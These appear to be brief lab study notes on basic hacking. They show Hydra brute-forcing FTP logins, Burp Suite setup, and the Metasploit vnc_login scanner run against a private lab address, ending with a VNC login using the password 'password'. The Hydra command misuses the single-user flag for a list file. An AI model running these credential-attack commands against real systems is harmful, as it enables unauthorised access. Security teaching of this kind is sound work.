What is Hacking?

Using software or systems in ways that they were not designed to be used. 

  • Overt use is the designed purpose
  • Covert use is other than the designed use

Hydra = Brute force for 

Examples:

hydra -l user.txt -P passlist.txt 192.168.56.101 ftp

  • try a list of users against the server

firefox in Kali, change network setting at bottom of preferences

Start Burp Suite, turn off interceptor under poxy

Start metasploite by typing msfconsole

search vnc_login

use auxiliary/scanner/vnc/vnc_login

set rhosts 192.168.56.101

run (or exploit)

vncviewer 192.168.56.101

the password is password